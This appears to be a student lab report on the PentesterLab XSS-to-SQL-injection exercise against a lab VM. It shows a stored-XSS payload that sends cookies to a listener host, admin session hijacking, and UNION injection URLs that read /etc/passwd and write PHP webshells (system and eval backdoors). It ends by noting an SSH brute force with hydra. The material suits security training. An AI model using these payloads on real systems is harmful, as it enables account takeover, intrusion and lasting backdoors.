Experiment report five

Please refer to the sql injection target machine attack process

https://pentesterlab.com/exercises/from_sqli_to_shell/course

http://www.sohu.com/a/126855490_472906

Please refer to the attack process of xss target drone

https://pentesterlab.com/exercises/xss_and_mysql_file/course

Open the webpage on the 192.168.165.129 machine:

 

is a blog system.

Below each blog title can be rated:

 

Test whether there is an xss vulnerability.

It is found that there is a pop-up box after submitting:

 

 

further structure the content

<script>document.write('<img src="http://192.168.179.142/?'+document.cookie+' "/>');</script> 
At the same time, open port 80 with nc on the 192.168.165.1298 machine .

 

Log in to the admin account on the original machine, the password is p4ssw0rd

 

Log in to view the comment thread just posted.

Then check the return content of nc.

 

 

Get cookie information.

Copy the cookie and open the page where the comment is located. And modify the value of the cookie to the value just copied.

 

Refresh the next page and find that you have logged into the page as admin.

After entering the management interface, it is found that there is a sql injection vulnerability in the blog editing interface.

 

http://192.168.165.129/admin/edit.php ?id=4 union select 1,2,3,4

Findings 2 and 3 can be displayed.

 

 

 

http://192.168.165.129/admin/edit.php ?id=0 union select 1,2,load_file("/etc/passwd"),4

 

The passwd file can be read, but the shadow file cannot be read. Let's try if we can create a file.

On the edit page, I found that there is an error message in the /var/www/classes directory,

 

 

 

 When viewing the source code, I found that there is a css directory

After trying it out, the /var/www/css directory is writable.

So construct the statement:

http://192.168.165.129/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

then open

http://192.168.165.129/css/s.php

show:

 

It means that the s.php file is successfully written to the /var/www/css directory, and the following will

<?php system($_GET['c']); ?>

Write in z.php and construct the url as:

http://192.168.165.129/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

Access z.php and use uname -a to get system information. Commands can be executed remotely.

 

Write a sentence Trojan horse below to construct the url:

http://192.168.165.129/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

Knife link:

 

 I found that the machine had ssh turned on before, so I blasted it with hydra:

 

 ssh login